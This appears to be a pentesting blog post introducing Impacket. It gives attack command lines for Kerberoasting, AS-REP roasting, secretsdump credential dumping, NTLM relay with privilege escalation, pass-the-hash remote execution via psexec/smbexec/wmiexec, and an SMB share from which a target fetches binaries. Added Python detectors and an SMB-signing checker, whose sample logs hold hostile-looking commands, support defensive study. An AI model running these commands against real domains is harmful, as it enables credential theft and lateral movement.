Impacket in Action

Introduction

In this blog post we will learn about the Impacket library and its usage during pentesting, and we will also discuss some of the useful tools that ship with it. This post is for those who know the basics of Active Directory and Windows administration services. If you’re new to these, a quick Google search on any unfamiliar term will get you up to speed.

Impacket

https://github.com/SecureAuthCorp/impacket.git

Clone the repo

git clone https://github.com/SecureAuthCorp/impacket.git

Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and, for some protocols (e.g. SMB1-3 and MSRPC), the protocol implementation itself. Packets can be constructed from scratch as well as parsed from raw data, and the object-oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.

What protocols are featured?

  • Ethernet, Linux “Cooked” capture.
  • IP, TCP, UDP, ICMP, IGMP, ARP.
  • IPv4 and IPv6 Support.
  • NMB and SMB1, SMB2 and SMB3 (high-level implementations).
  • MSRPC version 5, over different transports: TCP, SMB/TCP, SMB/NetBIOS, and HTTP.
  • Plain, NTLM, and Kerberos authentications, using password/hashes/tickets/keys.
  • Portions/full implementation of the following MSRPC interfaces: EPM, DTYPES, LSAD, LSAT, NRPC, RRP, SAMR, SRVS, WKST, SCMR, BKRP, DHCPM, EVEN6, MGMT, SASEC, TSCH, DCOM, WMI.
  • Portions of TDS (MSSQL) and LDAP protocol implementations.

Install the dependencies and then the library itself:

pip install -r requirements.txt
python setup.py install

You can find all of the Impacket tools in the ‘/impacket/examples’ directory.

Explanation

addcomputer.py: Adds a computer account to a domain using LDAP or SAMR (SMB).

addcomputer.py -method SAMR -computer-pass <PASSWORD> -computer-name <NAME> DOMAIN/USER:PASSWORD

This adds a new computer account to the domain using SAMR (the Security Account Manager (SAM) Remote Protocol, client-to-server).

GetUserSPNs.py: This example will try to find and fetch Service Principal Names that are associated with normal user accounts. The output is compatible with JtR and HashCat.

If we find any user accounts configured with unconstrained delegation, we can obtain their Kerberos tickets and try to crack them offline.

GetUserSPNs.py DOMAIN/USER:PASSWORD -request-user <UNCONSTRAINED_USER>

GetNPUsers.py: This example will attempt to list and get TGTs for those users that have the property ‘Do not require Kerberos preauthentication’ set (UF_DONT_REQUIRE_PREAUTH). The output is compatible with JtR.

GetNPUsers.py DOMAIN/USER -dc-ip 10.10.10.161

Here 10.10.10.161 is the IP address of the target domain controller.
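Both GetUserSPNs.py and GetNPUsers.py leave a clear trace on the domain controller: a 4768 (TGT request) logged with PreAuthType 0, and a burst of 4769 (service ticket request) events for user SPNs with RC4 (etype 0x17) encryption. The detection below is an added example written for this post, not code from the original post or from the Impacket project. It assumes the events have already been parsed into dicts using the field names Windows puts in the 4768/4769 event XML (TargetUserName, ServiceName, TicketEncryptionType, PreAuthType, IpAddress); the records in SAMPLE_EVENTS are constructed, not real log data.

```python
"""Flag AS-REP roasting and Kerberoasting patterns in Windows Security log records.

Added example for this post (not code from the original post or from the
Impacket project). It assumes records have already been parsed into dicts
carrying the fields of Event IDs 4768 (TGT request) and 4769 (service ticket
request): TargetUserName, ServiceName, TicketEncryptionType, PreAuthType,
IpAddress. The records in SAMPLE_EVENTS are constructed, not real log data.
"""
from collections import defaultdict
from dataclasses import dataclass

RC4_HMAC = 0x17   # Kerberos etype 23; GetUserSPNs.py / GetNPUsers.py output is cracked from this
NO_PREAUTH = 0    # PreAuthType 0: TGT issued without pre-authentication

# Constructed sample records (assumed field names, values invented for the example).
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "svc-alfresco", "ServiceName": "krbtgt",
     "TicketEncryptionType": 0x17, "PreAuthType": 0, "IpAddress": "10.10.14.6"},
    {"EventID": 4768, "TargetUserName": "jdoe", "ServiceName": "krbtgt",
     "TicketEncryptionType": 0x12, "PreAuthType": 2, "IpAddress": "10.10.10.50"},
    {"EventID": 4769, "TargetUserName": "jdoe@EMPIRE.LOCAL", "ServiceName": "svc-sql",
     "TicketEncryptionType": 0x17, "IpAddress": "10.10.14.6"},
    {"EventID": 4769, "TargetUserName": "jdoe@EMPIRE.LOCAL", "ServiceName": "WS01$",
     "TicketEncryptionType": 0x12, "IpAddress": "10.10.10.50"},
    {"EventID": 4769, "TargetUserName": "jdoe@EMPIRE.LOCAL", "ServiceName": "svc-backup",
     "TicketEncryptionType": 0x17, "IpAddress": "10.10.14.6"},
    {"EventID": 4769, "TargetUserName": "jdoe@EMPIRE.LOCAL", "ServiceName": "svc-web",
     "TicketEncryptionType": 0x17, "IpAddress": "10.10.14.6"},
]


@dataclass(frozen=True)
class Finding:
    technique: str
    account: str
    source_ip: str
    detail: str


def is_asrep_roast(ev):
    """4768 without pre-auth: the AS-REP's encrypted part can be cracked offline."""
    return ev.get("EventID") == 4768 and ev.get("PreAuthType") == NO_PREAUTH


def is_rc4_user_spn_request(ev):
    """4769 for a user SPN (not a machine account, not krbtgt) with an RC4 ticket."""
    if ev.get("EventID") != 4769 or ev.get("TicketEncryptionType") != RC4_HMAC:
        return False
    svc = ev.get("ServiceName", "")
    return not svc.endswith("$") and svc.lower() != "krbtgt"


def detect(events, kerberoast_threshold=3):
    """Return one Finding per no-preauth TGT and one per requester that asked for
    RC4 service tickets for at least `kerberoast_threshold` distinct user SPNs."""
    findings = []
    rc4_services = defaultdict(set)  # (source_ip, requesting account) -> SPNs requested
    for ev in events:
        if is_asrep_roast(ev):
            findings.append(Finding("AS-REP roasting", ev["TargetUserName"], ev["IpAddress"],
                                    "TGT issued with PreAuthType 0, etype 0x%x"
                                    % ev["TicketEncryptionType"]))
        elif is_rc4_user_spn_request(ev):
            rc4_services[(ev["IpAddress"], ev["TargetUserName"])].add(ev["ServiceName"])
    for (ip, account), services in rc4_services.items():
        if len(services) >= kerberoast_threshold:
            findings.append(Finding("Kerberoasting", account, ip,
                                    "RC4 service tickets requested for %d user SPNs: %s"
                                    % (len(services), ", ".join(sorted(services)))))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f.technique:15} account={f.account:20} from={f.source_ip:12} {f.detail}")
```

A single RC4 service-ticket request is normal background noise on many domains, which is why the Kerberoasting branch aggregates per requester and only fires above a threshold; the no-preauth TGT, by contrast, is rare enough to alert on individually.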

secretsdump.py: Performs various techniques to dump secrets from the remote machine without executing any agent there.

secretsdump.py DOMAIN/USER:PASSWORD@<VictimIP>
secretsdump.py Empire/locus:brokeme@198.162.0.1

lookupsid.py: Enumerates local and domain users on the target Windows machine by brute-forcing SIDs over MSRPC.

lookupsid.py user:password@<targetip>

ntlmrelayx.py: This script performs NTLM Relay Attacks, setting an SMB and HTTP Server and relaying credentials to many different protocols (SMB, HTTP, MSSQL, LDAP, IMAP, POP3, etc.). The script can be used with predefined attacks that can be triggered when a connection is relayed (e.g. create a user through LDAP) or can be executed in SOCKS mode. In this mode, for every connection relayed, it will be available to be used later on multiple times through a SOCKS proxy.

ntlmrelayx.py --escalate-user username -t ldap://DOMAIN_CONTROLLER
ntlmrelayx.py -t ldap://10.10.10.161 --escalate-user svc-alfresco
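Whether a relayed SMB session is usable at all is decided by one bit in the server's SMB2 NEGOTIATE response: SMB2_NEGOTIATE_SIGNING_REQUIRED in SecurityMode. The parser below is an added example written for this post, not code from the original post or from the Impacket project, and uses only the standard library. It builds two constructed NEGOTIATE responses (not real captures) following the MS-SMB2 layout (64-byte header followed by a body with StructureSize 65) and reports which one would reject a relayed session, which is the check to run across your own hosts when deciding where "Require signing" still needs to be enforced.

```python
"""Check from an SMB2 NEGOTIATE response whether a server requires message signing.

Added example for this post (not code from the original post or from the
Impacket project); standard library only. The byte layout follows MS-SMB2
(64-byte header, NEGOTIATE response body of StructureSize 65). The responses
used below are constructed with build_negotiate_response(), not real captures.
"""
import struct

SMB2_MAGIC = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001
SIGNING_ENABLED = 0x0001    # SMB2_NEGOTIATE_SIGNING_ENABLED
SIGNING_REQUIRED = 0x0002   # SMB2_NEGOTIATE_SIGNING_REQUIRED

HEADER_FMT = "<4sHHIHHIIQIIQ16s"      # ProtocolId .. Signature, 64 bytes
NEG_RESP_FMT = "<HHHH16sIIIIQQHHI"    # StructureSize .. NegotiateContextOffset, 64 bytes


def build_negotiate_response(security_mode, dialect=0x0302):
    """Construct a minimal server NEGOTIATE response (for the example only)."""
    header = struct.pack(HEADER_FMT, SMB2_MAGIC, 64, 0, 0, SMB2_NEGOTIATE, 1,
                         SMB2_FLAGS_SERVER_TO_REDIR, 0, 0, 0, 0, 0, b"\x00" * 16)
    body = struct.pack(NEG_RESP_FMT, 65, security_mode, dialect, 0, b"\x00" * 16,
                       0, 0x800000, 0x800000, 0x800000, 0, 0, 128, 0, 0)
    return header + body + b"\x00"  # one byte for the (empty) security buffer


def parse_signing(buf):
    """Return dialect and signing flags from a NEGOTIATE response, validating the framing."""
    if len(buf) < 64 + 64 or buf[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 message")
    command, = struct.unpack_from("<H", buf, 12)   # header offset 12: Command
    flags, = struct.unpack_from("<I", buf, 16)     # header offset 16: Flags
    if command != SMB2_NEGOTIATE or not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise ValueError("not a server NEGOTIATE response")
    structure_size, security_mode, dialect = struct.unpack_from("<HHH", buf, 64)
    if structure_size != 65:
        raise ValueError("unexpected NEGOTIATE response StructureSize %d" % structure_size)
    return {
        "dialect": dialect,
        "signing_enabled": bool(security_mode & SIGNING_ENABLED),
        "signing_required": bool(security_mode & SIGNING_REQUIRED),
    }


def assess(buf):
    """One-line verdict for a host, from the defender's side."""
    info = parse_signing(buf)
    if info["signing_required"]:
        return "signing required: relayed sessions are rejected"
    return "signing not required: host would accept a relayed session (enforce 'Require signing')"


if __name__ == "__main__":
    for label, mode in (("signing required", SIGNING_ENABLED | SIGNING_REQUIRED),
                        ("signing enabled only", SIGNING_ENABLED)):
        print(f"{label:22} -> {assess(build_negotiate_response(mode))}")
```

In a real audit you would feed parse_signing() the first response captured after sending a NEGOTIATE to each host; the parser deliberately refuses anything that is not a server-to-client NEGOTIATE so that a stray reply cannot be misread as "signing not required". The same reasoning applies to the LDAP target in the commands above, where the corresponding controls are LDAP signing and channel binding on the domain controller.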

psexec.py: Used for remote code execution. It executes processes on remote systems and redirects the output of console applications to the local system, so that these applications appear to be running locally.

psexec.py -hashes <LMHASH>:<NTHASH> domain/user@<TargetIP>
psexec.py -hashes :73ry4923rho24jr2jeor2po3j Empire/administrator@192.168.10.16 powershell.exe

smbexec.py: It focuses on using native Windows functions/features for post-exploitation and expanding access on a network after you gain some credentials, whether that is a hash or a password for a local or domain account. It’s similar to psexec.

smbexec.py Empire/administrator@192.168.10.16

You can also authenticate with a hash instead of a password, as with psexec.py.

wmiexec.py: A semi-interactive shell, used through Windows Management Instrumentation. It does not require installing any service or agent on the target server. Runs as Administrator. Highly stealthy.

wmiexec.py 'Empire/administrator@192.168.10.16'
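The three exec tools above are "agentless" from the target's point of view, but each leaves a distinctive record: smbexec.py installs a service (default name BTOBTO) whose image is a cmd.exe /Q /c one-liner echoing output into \\127.0.0.1\C$\__output, wmiexec.py has WmiPrvSE.exe spawn cmd.exe /Q /c ... 1> \\127.0.0.1\ADMIN$\__<timestamp> 2>&1, and psexec.py installs a service with a random name whose binary is dropped into the system root. The scanner below is an added example written for this post, not code from the original post or from the Impacket project. It assumes System log 7045 and Security log 4688 records already parsed into dicts (ServiceName, ImagePath, ParentImage, CommandLine); the psexec.py rule is a heuristic and the records in SAMPLE_EVENTS are constructed.

```python
"""Flag artefacts that psexec.py, smbexec.py and wmiexec.py leave in Windows event logs.

Added example for this post (not code from the original post or from the
Impacket project). It assumes records already parsed into dicts: System log
7045 (service installed: ServiceName, ImagePath) and Security log 4688
(process creation: ParentImage, CommandLine). The psexec.py rule (random
letters-only service name, binary directly under %systemroot%) is a heuristic
assumed here. SAMPLE_EVENTS is constructed, not real log data.
"""
import re

# cmd.exe started with /Q /c, as both smbexec.py and wmiexec.py do
QUIET_CMD = re.compile(r"(?:cmd\.exe|%COMSPEC%)\s+/Q\s+/c", re.IGNORECASE)
# output redirected through the loopback admin share, e.g. \\127.0.0.1\ADMIN$\__1614...
LOOPBACK_SHARE = re.compile(r"\\\\127\.0\.0\.1\\(?:C\$|ADMIN\$)\\__", re.IGNORECASE)
# heuristic for psexec.py: random letters-only name, binary directly under %systemroot%
RANDOM_NAME = re.compile(r"^[A-Za-z]{4,8}$")
SYSROOT_EXE = re.compile(r"^(?:%systemroot%|C:\\Windows)\\[A-Za-z]{4,8}\.exe$", re.IGNORECASE)

SAMPLE_EVENTS = [
    # smbexec.py style service install
    {"EventID": 7045, "ServiceName": "BTOBTO",
     "ImagePath": r"%COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat "
                  r"& %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat"},
    # psexec.py style service install (names invented to look random)
    {"EventID": 7045, "ServiceName": "jBVd", "ImagePath": r"%systemroot%\WkuYTcXR.exe"},
    # ordinary service install
    {"EventID": 7045, "ServiceName": "Sense",
     "ImagePath": r"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"},
    # wmiexec.py style process creation
    {"EventID": 4688, "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1614227158.5 2>&1"},
    # ordinary admin activity
    {"EventID": 4688, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd.exe /c ipconfig /all"},
]


def check_service_install(ev):
    """Reasons a 7045 record looks like an Impacket exec tool, empty if none."""
    name, path = ev.get("ServiceName", ""), ev.get("ImagePath", "")
    reasons = []
    if name == "BTOBTO":
        reasons.append("smbexec.py default service name BTOBTO")
    if QUIET_CMD.search(path) and LOOPBACK_SHARE.search(path):
        reasons.append("service image is cmd.exe /Q /c with output sent to a loopback admin share")
    if RANDOM_NAME.match(name) and SYSROOT_EXE.match(path):
        reasons.append("psexec.py-like: random service name with binary dropped in %systemroot% (heuristic)")
    return reasons


def check_process(ev):
    """Reasons a 4688 record looks like wmiexec.py/smbexec.py command execution."""
    cmd, parent = ev.get("CommandLine", ""), ev.get("ParentImage", "").lower()
    reasons = []
    if QUIET_CMD.search(cmd) and LOOPBACK_SHARE.search(cmd):
        via = "wmiexec.py (parent WmiPrvSE.exe)" if parent.endswith("wmiprvse.exe") else "smbexec/wmiexec style"
        reasons.append(f"{via}: cmd.exe /Q /c with output sent to a loopback admin share")
    return reasons


def scan(events):
    """Return (EventID, reason) pairs for every matching record."""
    findings = []
    for ev in events:
        checker = {7045: check_service_install, 4688: check_process}.get(ev.get("EventID"))
        for reason in (checker(ev) if checker else []):
            findings.append((ev["EventID"], reason))
    return findings


if __name__ == "__main__":
    for eid, reason in scan(SAMPLE_EVENTS):
        print(eid, reason)
```

The loopback-share redirection is the most durable signal: an operator can rename the service or change the shell wrapper, but output still has to come back over the admin share, so matching on \\127.0.0.1\C$ or \\127.0.0.1\ADMIN$ in a service image or command line survives most cosmetic changes. Event 4688 only carries CommandLine if command-line auditing is enabled, so that setting is a prerequisite for the process check.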

smbserver.py: A Python implementation of an SMB server. Lets you quickly set up shares and user accounts.

smbserver.py temp /DIRECTORY/win_binaries

You now have an SMB server running on your machine and can share resources, including Windows utilities, with the target system. To check the server:

smbclient //yourIP/temp

On the target system:

\\10.10.14.6\temp\whoami.exe

Conclusion

We have discussed some tools and their basic usage that will help us in the Exploitation and Post-Exploitation phases. I recommend reading the resources given below.

Some reference links:

https://www.secureauth.com/labs/open-source-tools/impacket

http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html

https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/